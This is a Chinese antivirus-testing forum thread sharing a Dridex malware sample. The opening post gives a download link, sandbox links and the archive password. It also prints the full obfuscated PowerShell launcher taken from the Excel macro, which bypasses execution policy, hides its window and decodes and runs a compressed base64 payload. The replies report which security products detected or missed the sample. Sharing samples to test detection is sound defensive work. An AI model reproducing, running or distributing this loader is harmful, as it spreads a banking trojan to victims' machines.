#Dridex (2020-06-09)

显示全部楼层 · 发表于 2020-6-9 11:23:57

本帖最后由 QVM360 于 2020-6-9 11:28 编辑

https://mc163.lanzous.com/iaQOEdhexna

https://www.virustotal.com/gui/file/5f68e13f8bf051e68782ba9f3d67555b3b8ca8d8b06b9d6b98c5c45c7217b1e3/community
https://app.any.run/tasks/1cca53f1-60c9-41a4-a16f-13c4e2996889

infected
POWERSHELL CODE IN MACROS

POWerShell -NOnin -EXECUTIOnP ByPASs -NOP -WIn 00001 $K5 =([ChAr]34).ToString() ;Sv ('1O') ( ([Char]44).ToStrInG()) ; .( $psHoME[21]+$psHOMe[34]+'x')( ""&(${K5}{1}{0}${K5} -f'al'${1O}'s') (${K5}{1}{0}${K5}-f'er'${1O}'us') (${K5}{2}{3}{1}{0}${K5}-f (${K5}{1}{0}${K5} -f 't'${1O}'jec')${1O}'-Ob'${1O}'N'${1O}'ew');.( `${en`V:c`o`MSPec}[4${1O}26${1O}25]-JoiN'')( .('u'+'ser') sYsTEM.IO.ComprEssiON.DeFlAtesTream([io.MeMORySTReAm][sYsTem.convERT]::FrOMbasE64STRiNg( (${K5}{49}{37}{28}{24}{6}{26}{22}{40}{36}{43}{23}{29}{3}{18}{8}{14}{0}{34}{9}{30}{15}{56}{50}{53}{45}{46}{21}{55}{42}{4}{12}{31}{2}{54}{52}{41}{47}{39}{44}{1}{17}{13}{27}{48}{51}{33}{10}{7}{32}{38}{11}{35}{5}{16}{19}{25}{20}${K5}-f'PidiWbxN1QJJk+'${1O}'xUS8pDDCnCtSVT5+J'${1O}'8KxwbIt5bou9fUFrA4wQ8'${1O}'5CMHChNFvvcEtaDkiC0Y790rXq2yk8bmoJeLELMbo3xPcmLMCYLDAkKTrZFFDIulWGLfe7VM5z5EIEf1m'${1O}'QQcBRDpdW1w/4J8XN9stkCWRF3vfhphQ+sF09+yhDxkjoyKJJEEWAMT88tCefRBkYASk1f2IWkPVU'${1O}'ZH1MkETXDpLxOWhhYduCZtYSni/m4ciZL6SdUgVV53sGnNxiGnQ9rpt9VoQIbPnXT+S0icyMo94FchfmZmvzDiyX9Qw2+ee2S5sqQDqG'${1O}'O/leUWbj54E1hw2XAvdUpLCq3DkK2RY2P8DVN0y4v3Q/4D5kN1224B2igYSGYhTJ6ADCQM'${1O}'WPlB8xebHAgHAvFwYWdG1H4HE2AXPpXUcaHDjhGaAIjxe/'${1O}'HUVJA3uVNt54QcGsdYVk49mlfNMsXn8sX8OeZuqJJCDyNRBNfrGGtsdp7C+7'${1O}'MhWktWzRnA33Hne2DMzmLPB3IxYcHJB'${1O}'brATRSzMU1k8r71NwyNS1v1QA6L2A7fkPl0ogS+YFF3gPVQA9In5MeLj5Qcyn+7mjgyLKBKUQWTzaFYzpB9wbQ7B2PzwvHQ098jsgcXnfpL1soTYndUvxt5EcfZHX4B/b/BLtoW5d+Bzl6KAn9EyZtroPJzpsf5OVL4Iyk06eQH4JqRXYFVL6WqXVHwQEcjV9tCqNxva4+0vHqDzUd0yYm2PXnE05pxxCGjCYSxfaNbmoRTWTG5xNCIx7HDgGqXcLtBqtiCz0+5+2f79kJbQTCR'${1O}'e6KP'${1O}'A/U7O4'${1O}'gThpncZstK2qfcWPKXlquwwqbF1UudZKMr5wKcILyWxU549hoH27JoxkyScq4AELakXx9Ymua9HUih4NF4nF2dHOBMa/hMF7+G4bb5rYsWp+a10AFxVlrYwez+fxUtZmhCc3BEzJW'${1O}'4nrKtFAtHh94K7VjAp1thZPKRhPuXkAcO5hGINzrewf/JiihEU/SA7Vx7wYoESgcUuULLvhzhyw/aFVojYHwfeID9v4UAC3r3YNE2JNK6Hjx7+'${1O}'U4Lkwh3QVfvlvgSuE4zm/P76awvQJ7Q9haL'${1O}'jm'${1O}'4HvUh9HVDr9DbZ6Q'${1O}'KWsEWp8vw7hvoNxp8ltu0Ipa01BkzaXeUBklCwjom4QssHeByWf2+OvR'${1O}'Z/p6NcO6ZIqgcma67h'${1O}'eP9l8='${1O}'ZF2AkTIkp+0x+TI'${1O}'gN48OAyu8ZbB'${1O}'wSOcXy+3'${1O}'nCbmEPHvnItoinKaZcKO2qwxlqD'${1O}'U8gINhVLopwG/iHGkwjvPhIHIFWrm4gBKFWQp7btpyo66Ipb2QNDDFWbtLWb9Nx7dqjMgO8pG9A46N/DkmG0GINVH+1shRi5KpDD1U0LpGfvqOz7LocDQcJWU1MYMOhu6qyzKfTPLrvL3AT7Ofg3hohlnG{过}F{滤}WRqbkKMPvQhVtimuo4nYzUNctGainOw6r5Khw9h0oJTznBl2aKJvzXUEQXaID+WyV'${1O}'QFioCTCnnqwcZvQQvfKzP+vGOooiZVfEP5x68CNUp1YPgNcZbMG3fGz3AOr+XDNISfwOkvO'${1O}'kRYwVEPVWJsek'${1O}'+79vVYO8zN39ACLdXW9P1VOFYhTVY1kcL8SxIlRFXxGuk3MSW'${1O}'8aov6OtrL94uHZI3t5KjI'${1O}'h3Nre0mVDtprDzqd30TRyIAegah8yUF'${1O}'tFU20oCw3HCiTyyRJfPqCWRrWJZbo'${1O}'gkQ9ZC2YQ2JK1WptM14GzDse0I9DaNFDU4'${1O}'Q54BBkXtbSUV9YL2VEQaI4n/5OzAA3A+Z'${1O}'bcX0Q+AgNw0DpnSWI2lHnWmiGujVph/annT5d+m+3prfs'${1O}'HVVy7g+GyVIrsUUpNZbaAypwXZ1cfnM2l6bNIAHScl3c/OC3s0GhccsU/4n+GuqD+vs/VuS'${1O}'17Ho2tnhGyxT5wOLwwBrEtipIEBKOhEDaG5RFaQZZtUiLV21e4D6TvM/4xkGZVpc8n/1UwhmMA/f7EGsIvigg/0Jqe'${1O}'iYqBnnHj2eXWKIMVHjqNHkOp5toq2SQXCgNcl1'${1O}'WAG6IXH1y6KHIkGqH0F2lB0l8Njh46FobY'${1O}'HQTYm9ti/Q'${1O}'9'${1O}'PLIlpgGTBuRyOGHQ'${1O}'sJCRbcPCia86h2zmuXxtfPla81hLvVgrTMOIMit8qXLRhM9j9tzNwFhT3RTy4zdq4k2YxyohCUOQpF86xIthWiQZIoxZQbqonf'${1O}'sYCTGugpHC/pq/1WE02IIP/YyQjKwKGQy'${1O}'pd9N4OiHmUuosJyDA6JhKGS4c4WgbVEMJ6BnUUDW52TdKBq2oQUSDlW/xJTEvxgqdqS6a'${1O}'rxubhUwF5'${1O}'MW8TIdvv2VuYd3wxs+O369nKa4kamDilh0LeiRCBcpJRgLQWFVzYGHHzRtFwaAATjj120dBKW8wu190YG6EL5PVHKnq7CYsV4/F9roNNeRXJLEaGcuO20vkHgl9KsHkNH+zZ3'${1O}'c0moqYqL8z8w2Eyeo0tRwgZ5TdfVzd1ASBjLaas'${1O}'OpvlsYnZHhPRuFurErHO9CHn0yNzuQ1xYqyR1cED02ghKFXaJp+5ztehDA2LXrTlknWn9A6Z3S7w0a'${1O}'dVdtd6JKEv4rDMdNyx'${1O}'rNasLS7Q5KZ2AEQEOQsJ'${1O}'8p'${1O}'YsJrscRKCFFGPlMYgh2GUwAE2zyjzX74iztbwlyg3yYCn61X61YsHI+Ysp5Rro8IFTlLKiM1tBjxT9195hXAP6'${1O}'hm4ODFp99FS6/WIbK'${1O}'H4JQr6QG2Wc12KekIRCij+uoaFpsP0Lbv8npidEp+Gsip+KZxlKRHDR45Dr6MgYs9z3PI'${1O}'+dZD0wL+BL0lM1leau0/0HeHkeB'${1O}'GKGnOVEYxW2WxHaSTbIg') )${1O}[syStEm.iO.CoMPResSION.coMpREsSioNMoDe]::decomPresS ) | &('%') { .('use'+'r') IO.STReAMrEaDeR(`${_} ${1O} [sysTem.tExT.eNcOdING]::utf8) } | .('%'){ `${_}.rEAdTOenD() })"" )

复制代码

显示全部楼层 · 发表于 2020-6-9 11:30:58

Avast IDP拦截powershell

显示全部楼层 · 发表于 2020-6-9 11:31:35

本帖最后由 feixiangba 于 2020-6-9 11:39 编辑

Kaspersky Internet Security

09.06.2020 11.29.31 检测到的对象 ( 文件 ) 已删除 D:\Desktop\5f68e13f8bf051e68782ba9f3d67555b3b8ca8d8b06b9d6b98c5c45c7217b1e3.xlsm//xl/vbaProject.bin//Sheet1 文件: D:\Desktop\5f68e13f8bf051e68782ba9f3d67555b3b8ca8d8b06b9d6b98c5c45c7217b1e3.xlsm//xl/vbaProject.bin//Sheet1 对象名称: HEUR:Trojan.MSOffice.SAgent.gen 对象类型: 木马程序时间: 2020/6/9 11:29
09.06.2020 11.29.31 检测到的对象 ( 文件 ) 已删除 D:\Desktop\5f68e13f8bf051e68782ba9f3d67555b3b8ca8d8b06b9d6b98c5c45c7217b1e3.xlsm//xl/vbaProject.bin 文件: D:\Desktop\5f68e13f8bf051e68782ba9f3d67555b3b8ca8d8b06b9d6b98c5c45c7217b1e3.xlsm//xl/vbaProject.bin 对象名称: HEUR:Trojan.MSOffice.SAgent.gen 对象类型: 木马程序时间: 2020/6/9 11:29
09.06.2020 11.29.31 检测到的对象 ( 文件 ) 已删除 D:\Desktop\5f68e13f8bf051e68782ba9f3d67555b3b8ca8d8b06b9d6b98c5c45c7217b1e3.xlsm 文件: D:\Desktop\5f68e13f8bf051e68782ba9f3d67555b3b8ca8d8b06b9d6b98c5c45c7217b1e3.xlsm 对象名称: UDS:DangerousObject.Multi.Generic 时间: 2020/6/9 11:29

复制代码

就很疑惑，VT上ZoneAlarm报了UDS，我这也报了UDS，然而VT上的卡巴不报

显示全部楼层 · 发表于 2020-6-9 12:04:08

智量 Trojan.Downloader.Generic

显示全部楼层 · 发表于 2020-6-9 12:28:29

360过

显示全部楼层 · 发表于 2020-6-9 12:39:09

有点意思

显示全部楼层 · 发表于 2020-6-9 12:46:34

eset miss

显示全部楼层 · 发表于 2020-6-9 13:13:46

毒霸不杀

显示全部楼层 · 发表于 2020-6-9 13:29:12

火绒 Miss

显示全部楼层 · 发表于 2020-6-9 13:30:20

趋势双击拦截excel

[病毒样本] #Dridex (2020-06-09)

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源